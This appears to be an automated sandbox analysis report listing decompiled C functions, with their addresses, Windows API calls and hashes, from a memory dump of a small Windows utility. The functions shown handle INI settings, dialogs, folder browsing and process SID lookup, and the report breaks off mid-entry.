                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}






                                                                                                                    0x00409a4a
                                                                                                                    0x00409a4f
                                                                                                                    0x00409a56
                                                                                                                    0x00409a5e
                                                                                                                    0x00409a60
                                                                                                                    0x00409a6e
                                                                                                                    0x00409a6e
                                                                                                                    0x00409a60
                                                                                                                    0x00409a71
                                                                                                                    0x00409a76
                                                                                                                    0x00000000
                                                                                                                    0x00409a78
                                                                                                                    0x00000000
                                                                                                                    0x00409a89

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                      • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                    • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                    • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                                    • API String ID: 946536540-379566740
                                                                                                                    • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                    • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                                    • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                    • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                                                    0x0040588e
                                                                                                                    0x0040588f
                                                                                                                    0x0040588f
                                                                                                                    0x00405892
                                                                                                                    0x00405896
                                                                                                                    0x004058a9
                                                                                                                    0x004058a9
                                                                                                                    0x004058ad
                                                                                                                    0x004058af
                                                                                                                    0x004058b5
                                                                                                                    0x004058b6
                                                                                                                    0x004058b9
                                                                                                                    0x004058c2
                                                                                                                    0x004058c3
                                                                                                                    0x004058c8
                                                                                                                    0x004058d2
                                                                                                                    0x004058d4
                                                                                                                    0x004058d9
                                                                                                                    0x004058e0
                                                                                                                    0x004058ea
                                                                                                                    0x004058ec
                                                                                                                    0x004058ed
                                                                                                                    0x004058f2
                                                                                                                    0x004058f9
                                                                                                                    0x00405902
                                                                                                                    0x00405898
                                                                                                                    0x00405898
                                                                                                                    0x0040589a
                                                                                                                    0x0040589c
                                                                                                                    0x004058a1
                                                                                                                    0x004058a2
                                                                                                                    0x004058a5
                                                                                                                    0x004058a7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004058a7
                                                                                                                    0x00405912
                                                                                                                    0x00405915
                                                                                                                    0x0040591e
                                                                                                                    0x0040591e
                                                                                                                    0x00405907
                                                                                                                    0x0040590b

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1865533344-0
                                                                                                                    • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                    • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                                    • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                    • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 35%
                                                                                                                    			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20);
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}










                                                                                                                    0x00409ddc
                                                                                                                    0x00409de4
                                                                                                                    0x00409df0
                                                                                                                    0x00409df5
                                                                                                                    0x00409df6
                                                                                                                    0x00409e03
                                                                                                                    0x00409e05
                                                                                                                    0x00409e06
                                                                                                                    0x00409e3b
                                                                                                                    0x00409e5d
                                                                                                                    0x00409e6a
                                                                                                                    0x00409e73
                                                                                                                    0x00409e75
                                                                                                                    0x00409e08
                                                                                                                    0x00409e08
                                                                                                                    0x00409e19
                                                                                                                    0x00409e37
                                                                                                                    0x00409e37
                                                                                                                    0x00409e81

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00409E08
                                                                                                                      • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                                      • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                                    • memset.MSVCRT ref: 00409E3B
                                                                                                                    • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1127616056-0
                                                                                                                    • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                    • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                                    • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                    • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 37%
                                                                                                                    			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                                                    0x0040ad06
                                                                                                                    0x0040ad0a
                                                                                                                    0x0040ad0c
                                                                                                                    0x0040ad14
                                                                                                                    0x0040ad19
                                                                                                                    0x0040ad1f
                                                                                                                    0x0040ad23
                                                                                                                    0x0040ad27
                                                                                                                    0x0040ad2a
                                                                                                                    0x0040ad2d
                                                                                                                    0x0040ad34
                                                                                                                    0x0040ad3b
                                                                                                                    0x0040ad3e
                                                                                                                    0x0040ad44
                                                                                                                    0x0040ad48
                                                                                                                    0x0040ad4a
                                                                                                                    0x0040ad52
                                                                                                                    0x0040ad5a
                                                                                                                    0x0040ad64
                                                                                                                    0x0040ad65
                                                                                                                    0x0040ad6b
                                                                                                                    0x0040ad6c
                                                                                                                    0x0040ad73
                                                                                                                    0x0040ad76
                                                                                                                    0x0040ad7c
                                                                                                                    0x0040ad7c
                                                                                                                    0x0040ad7f
                                                                                                                    0x0040ad84

                                                                                                                    APIs
                                                                                                                    • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                                    • wcscpy.MSVCRT ref: 0040AD65
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3917621476-0
                                                                                                                    • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                    • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                                    • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                    • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                                                                    0x00404a62
                                                                                                                    0x00404a6a
                                                                                                                    0x00404a6e
                                                                                                                    0x00404a71
                                                                                                                    0x00404a74
                                                                                                                    0x00404a92
                                                                                                                    0x00404a92
                                                                                                                    0x00404a76
                                                                                                                    0x00404a76
                                                                                                                    0x00404a87
                                                                                                                    0x00404a90
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00404a90
                                                                                                                    0x00404aa3
                                                                                                                    0x00404aa7
                                                                                                                    0x00404aa7
                                                                                                                    0x00404a94
                                                                                                                    0x00404a98

                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32 ref: 00404A52
                                                                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Item
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3888421826-0
                                                                                                                    • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                    • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                                    • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                    • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}






                                                                                                                    0x004072e0
                                                                                                                    0x004072f7
                                                                                                                    0x004072fd
                                                                                                                    0x00407316
                                                                                                                    0x00407342

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004072FD
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                                    • strlen.MSVCRT ref: 00407328
                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2754987064-0
                                                                                                                    • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                    • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                                    • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                    • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                                                    0x00408dd0
                                                                                                                    0x00408dd2
                                                                                                                    0x00408de2
                                                                                                                    0x00408df4
                                                                                                                    0x00408e01
                                                                                                                    0x00408e1b
                                                                                                                    0x00408e21
                                                                                                                    0x00408e28
                                                                                                                    0x00408e30
                                                                                                                    0x00408dd4
                                                                                                                    0x00408dd8
                                                                                                                    0x00408dd8

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1386444988-0
                                                                                                                    • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                    • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                                    • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                    • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}








                                                                                                                    0x004050e1
                                                                                                                    0x004050ec
                                                                                                                    0x004050ee
                                                                                                                    0x004050f5
                                                                                                                    0x004050ff
                                                                                                                    0x00405114
                                                                                                                    0x00405118
                                                                                                                    0x00405123
                                                                                                                    0x00405128
                                                                                                                    0x00405101
                                                                                                                    0x00405109
                                                                                                                    0x0040510f
                                                                                                                    0x0040512e

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: wcslen$wcscatwcsncat
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 291873006-0
                                                                                                                    • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                    • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                                    • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                    • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}









                                                                                                                    0x00402de0
                                                                                                                    0x00402de2
                                                                                                                    0x00402dec
                                                                                                                    0x00402def
                                                                                                                    0x00402dfb
                                                                                                                    0x00402e0c
                                                                                                                    0x00402e0e
                                                                                                                    0x00402e0e
                                                                                                                    0x00402e16
                                                                                                                    0x00402e18
                                                                                                                    0x00402e1a
                                                                                                                    0x00402e21

                                                                                                                    APIs
                                                                                                                    • GetClientRect.USER32 ref: 00402DEF
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                    • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                      • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                                      • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$ClientPoints
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4235085887-0
                                                                                                                    • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                    • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                                    • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                    • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 72%
                                                                                                                    			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}







                                                                                                                    0x0040b6a6
                                                                                                                    0x0040b6ad
                                                                                                                    0x0040b6af
                                                                                                                    0x0040b6b0
                                                                                                                    0x0040b6b5
                                                                                                                    0x0040b6b6
                                                                                                                    0x0040b6bd
                                                                                                                    0x0040b6bf
                                                                                                                    0x0040b6c0
                                                                                                                    0x0040b6c5
                                                                                                                    0x0040b6c6
                                                                                                                    0x0040b6cd
                                                                                                                    0x0040b6cf
                                                                                                                    0x0040b6d0
                                                                                                                    0x0040b6d5
                                                                                                                    0x0040b6d6
                                                                                                                    0x0040b6dd
                                                                                                                    0x0040b6df
                                                                                                                    0x0040b6e0
                                                                                                                    0x00000000
                                                                                                                    0x0040b6e5
                                                                                                                    0x0040b6e6

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
